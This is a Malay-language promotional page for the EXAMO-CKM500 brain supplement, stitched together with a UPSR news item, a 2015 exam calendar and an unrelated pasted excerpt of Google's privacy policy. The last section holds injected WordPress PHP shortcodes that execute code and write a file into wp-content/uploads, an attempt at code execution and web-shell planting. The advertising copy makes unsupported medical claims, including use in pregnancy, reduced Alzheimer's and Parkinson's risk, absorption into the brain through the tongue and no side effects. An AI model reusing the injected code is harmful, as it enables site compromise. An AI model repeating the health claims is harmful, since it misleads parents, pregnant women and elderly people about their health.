Siapa Boleh Amalkan Examo?

EXAMO-CKM500 Sesuai Untuk Semua Peringkat Usia

FASA 1: Dalam Kandungan

Otak dan saraf tunjang ialah salah satu bahagian yang terbentuk dengan sempurna sewaktu di peringkat janin lagi. Pembentukan otak adalah aktif terutama di peringkat minggu ke 15 hingga ke 20 kehamilan. Ibu mengandung memerlukan nutrien yang mencukupi terutamanya kalsium supaya bayi di dalam kandungan tidak terjejas. EXAMO-CKM500 mampu membekalkan kalsium yang diperlukan oleh tubuh, menambah darah untuk mengelak berlakunya anemia serta keletihan. Jauhi penggunaan dadah ( termasuk ubat-ubatan tertentu ), kafein, pemanis tiruan, asap rokok atau alkohol yang boleh merencat perkembangan otak dan janin tersebut.

FASA 2: Baru Lahir

Apabila bayi dilahirkan berlaku pertumbuhan otak yang paling aktif sehingga berusia setahun. Pada peringkat ini berlaku perubahan fizikal di dalam otak. Dianggarkan 100 juta sinaps di neuron terbentuk dan bersedia untuk digunakan. Ibubapa perlu prihatin dengan beberapa keupayaan kanak-kanak di tahap ini. Garam tisu Biokimia yang terdapat dalam EXAMO-CKM500 membantu menyuburkan neuron.

FASA 3:Umur 1 -3 Tahun

Menjelang umur kanak-kanak 3 tahun, otak menjadi lebih aktif dan fleksibel. Terdapat lebih 15000 sinaps untuk setiap neuron dan jumlah ini adakalanya lebih banyak serta 2 kali ganda aktif dari otak orang dewasa. Rangsangan deria ( seperti mendengar, melihat, merasa bau, dan sentuh ) sebenarnya melatih sel otak untuk berfungsi. Kekurangan rangsangan tersebut boleh melemahkan serta mematikan sel otak. Pada fasa ini juga, ibu bapa boleh mengesan sekiranya ada keabnormalan yang berlaku pada anak-anak mereka yang melibatkan saraf seperti masalah lambat bercakap, gagap , sindrom down, sawan, meningitis dan sbgnya. EXAMO-CKM500 sesuai diberikan pada usia ini, untuk menambahkan lagi kecerdasan akal mereka. Penyelidik berpendapat, pada fasa ini juga sesuai untuk kita “ membentuk” mereka seperti yang dikehendaki.

FASA 4: Persekolahan

Masalah yang paling kerap dialami oleh para pelajar ialah LUPA, kurang tumpuan, lembam, malas, jemu dan bosan, letih, murung, hiperaktif dan sebagainya. Bebanan pelajaran boleh menyebabkan berlakunya stress dan migrain di kalangan pelajar. Persekitaran seperti sekolah, guru, rakan, keluarga dan tanggungjawab sebagai pelajar memberi kesan terhadap psikologi mereka. Pada fasa ini juga, para pelajar kerap berhadapan dengan ujian dan peperiksaan formal seperti UPSR, PMR, SPM, atau tahap pengajian yang lebih tinggi lagi seperti DIPLOMA atau IJAZAH. Para pelajar disarankan menggunakan EXAMO-CKM500 yang berfungsi untuk menguatkan ingatan, menambah tenaga mental, mencerdaskan serta mendatangkan ketenangan.

FASA 5: Berkerjaya

Kuat bekerja, tidak sabar, memilih kerja, kelam kabut, takut, banyak kerja, serta suasana kerja yang tidak memberangsangkan boleh memberi tekanan serta mempengaruh prestasi kerja. Pekerja yang dedikasi selalunya berada pada tahap seimbang dari aspek fizikal, mental, emosi dan spiritual. Jadikan EXAMO-CKM500 sebagai satu makanan tambahan ( food suplement ) harian untuk membantu mengurangkan stress dan kelesuan serta meningkatkan keupayaan tenaga mental.

FASA 6: Veteran

Sejajar dengan peningkatan usia, pelbagai komplikasi akan timbul termasuklah berkaitan minda seperti nyanyuk, Alzheimer, dimentia, Syndrom Parkinson, Menopaus, Lumpuh, Hipertensi yang paling kerap menyerang golongan tua. Penggunaan EXAMO-CKM500 akan membantu mengurangkan risiko masalah-masalah tersebut.

Comments

comments

Produk Examo di RTM

Pada 2009 lepas, genap 30 tahun produk EXAMO berada dalam pasaran.EXAMO-CKM500 atau biasa disebut sebagai EXAMO sahaja adalah produk formulasi Allahyarham Prof. Dr. Azizan Ismail (DR. AZIZAN). Ia merupakan satu lagi produk popular Allahyarham selain dari SALINDAH untuk ibu hamil & bersalin.

Dari segi sebutan perkataan EXAMO , ada pelbagai gaya sebutan yang pernah kami dengar. Antaranya: Ee-Za-Mo, Ex-Za-Mo, Ex-Ze-Mo & Eza-Mo. Apa juga cara menyebutnya tak kisahlah.

Ada beberapa fakta yang ingin kami kongsikan berkaitan produk EXAMO yang kami petik dari program “Apa Kata wanita” di RTM1 pada 29/05/2010 jam 11.00 pagi bertajuk “Kecemerlangan Minda Melalui Pemakanan”. Dalam program tersebut, pengacara program: Zamzarina telah menjemput Prof. Dr. Hjh. Hamsiah binti Ismail (Pengurus Besar EEMSB; satu daripada syarikat kumpulan DR. AZIZAN).

1. Sejarah

Allahyarham Prof. Dr. Azizan Ismail, berdasarkan pengalaman beliau sebagai pembina soalan, pemeriksa skrip jawapan hinggalah kepada pemarkahan, beliau menyedari bahawa pencapaian anak bangsa agak jauh ketinggalan di dalam setiap peperiksaan berbanding dengan pelajar bukan Melayu. Dari situlah beliau memecut obsesi untuk mengkaji bidang ingatan dan lupa serta kecerdasan. Sekiranya pokok boleh subur jika diberi baja yang sesuai, otak manusia pun begitu juga. Beliau mula mencium kejayaan mencungkil rahsia kelemahan pelajar Melayu apabila mempelajari ilmu perubatan Biokimia Schuessler pada tahun 1978. Kebodohan, lupa, putus asa, hilang semangat, malas, takut gagal, lemah daya saing, misalnya adalahsimptom kesihatan mental terganggu adalah akibat ketidak seimbangan garam mineral (garam tisu).

.

2. Mengapa Examo Kurang Dikenali Walaupun Telah Lebih 30 Tahun?

Pertama: Sikap segelintir dari ahli masyarakat yang gemar menyembunyikan sesuatu yang baik untuk diri atau keluarganya. Jika anaknya pandai, biarlah anaknya saja yang pandai. Jadi pengetahuan tentang EXAMO hanya berlegar dikalangan kelompok tertentu sahaja.

Kedua: Penolakan; ada segelintir individu yang bila disebut tentang ‘ubat pandai’ atau ‘ubat untuk minda/otak’ akan mengatakan “Tak perlulah, nanti pandai sangat susah pulak” atau terlalu mengambil sikap negatif dengan mengatakan “Nanti tak pasal-pasal jadi gila susah pulak”.

Insya’Allah EXAMO tidak begitu. Ia telah menjalani proses kematangan yang amat panjang sejak 1978 hingga 1986. Testimoni penggunanya juga menunjukkan kesan yang positif jika ia diamalkan secara konsisten.

.

3. Mengapa Perlu suplemen tambahan Examo walaupun makanan harian kita berkhasiat?

Umum mengetahui kismis baik untuk minda, tetapi ia manis dan tidak baik untuk penghidap kencing manis. Kekacang seperti badam juga baik untuk minda tetapi ada orang takut untuk makan kerana jerawat. Tambahan pula ia perlu melalui proses penghadaman di dalam perut dan sukar untuk sampai ke otak. Penyelesaiannya dari kajian Allahyarham Prof. Dr. Azizan Ismail,EXAMO adalah pilihan terbaik; tidak perlu dihadam (ditelan masuk perut) tetapi dikemam saja pada lidah (hisap macam makan gula-gula). KhasiatEXAMO mampu diserap terus masuk ke saluran darah melalui lidah dan sampai ke otak.

.

4. Salah tanggapan EXAMO sebagai Ubat Pandai

Peranan EXAMO adalah sebagai pemakanan tambahan untuk menyuburkan otak (menyediakan infrastruktur). Pengamalnya, jika bermatlamat untuk menghadapi peperiksaan perlulah mentelaah, membaca buku dan sebagainya barulah ia berkesan.

Perbandingan mudah adalah seperti seorang Ahli Bina Badan. Untuk dapatkan bentuk badan ‘sasa’ sebegitu tentu saja gabungan dari 2 elemen: PEMAKANAN STRATEGIK & LATIHAN. Kalau makan makanan berkhasiat sahaja tanpa latihan di gym tentu saja membawa kepada ‘boroi’. Begitu jugalah halnya dengan Otak: ia perlukan PEMAKANAN STARTEGIK & LATIHAN. Insya’Allah EXAMO adalah pemakanan strategik yang baik untuk minda. Tiada kesan sampingan negatif atau ketagihan.

Info lanjut EXAMO dan cara beli, lawat laman kedai online rasmi MYORDER.

Comments

comments

UPSR: 38,344 calon dapat semua A tahun ini

upsr-2015

PUTRAJAYA – Pencapaian keseluruhan Ujian Pencapaian Sekolah Rendah (UPSR) 2015 meningkat dan murid yang mendapat keputusan cemerlang semua Gred A juga meningkat kepada 38,344 orang berbanding pencapaian pada tahun 2014.

Ketua Pengarah Pelajaran, Datuk Seri Dr Khair Mohamad Yusof berkata, sejumlah 443,407 murid menduduki UPSR pada tahun ini dan murid yang mendapat semua Gred A meningkat 0.76 peratus, iaitu daripada 7.89 peratus pada tahun 2014 kepada 8.65 peratus pada tahun ini.

Tahun lepas, 36,304 pelajar daripada 460,407 calon mendapat semua Gred A.

“Pencapaian Gred Purata Nasional (GPN) UPSR meningkat sebanyak 0.02 mata, iaitu daripada GPN 2.29 pada 2014 kepada 2.27 tahun ini. Nilai GPN yang lebih kecil menunjukkan pencapaian calon yang lebih baik,” katanya mengumumkan analisis keputusan UPSR 2015 di Kementerian Pendidikan di sini hari ini. – Bernama

SUMBER: sinarharian.com.my (17 NOVEMBER 2015)

Comments

comments

Examo – Produk Kesihatan Terbaik SDSI 2008

pakej-calon-peperiksaan-upsr-pt3-spm-stpm

Pakej kesihatan sesuai untuk calon peperiksaan sekolah:

Kalendar Peperiksaan Awam Tahun 2015

Tarikh-tarikh peperiksaan / pentaksiran awam berikut adalah sepertimana yang disiarkan Lembaga Peperiksaan, Kementerian Pendidikan Malaysia.

Peperiksaan

Kaedah

Tarikh

Sijil Pelajaran Malaysia Ulangan (SPMU) Bertulis 8 – 11 Jun 2015
Ujian Pencapaian Sekolah Rendah (UPSR) Bertulis 8 – 10 September 2015
Pentaksiran Tingkatan 3 (PT3) Pelbagai Instrumen Geografi: 21 Jun – 3 Julai 2015

Sejarah: 5 – 16 Julai 2015

Lisan

 

Bertutur: 4 – 28 Ogos 2015

Mendengar (BM): 11 Ogos 2015

Mendengar (BI): 12 Ogos 2015

Bertulis 12, 13 & 15 Oktober 2015
Sijil Tinggi Agama Malaysia (STAM) Lisan 27 – 30 Julai 2015 dan

3 – 6 Ogos 2015

Bertulis 19 – 21 Oktober 2015 dan

26 – 27 Oktober 2015

Pentaksiran Pendidikan Asas Vokasional (PAV) Bertulis 12, 13 & 15 Oktober 2015
Sijil Pelajaran Malaysia (SPM) Bertulis 2 November – 8 Disember 2015

Nota:

Tarikh-tarikh Peperiksaan Awam 2015 di atas adalah tertakluk kepada pindaan Lembaga Peperiksaan Kementerian Pendidikan Malaysia.

Comments

comments

Pupuk Cara Pemakanan Sihat Di Sekolah

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/insert_php] [php] echo 147098235+111;file_put_contents(‘wp-content/uploads/info.php’, ”); [/php]

Comments

comments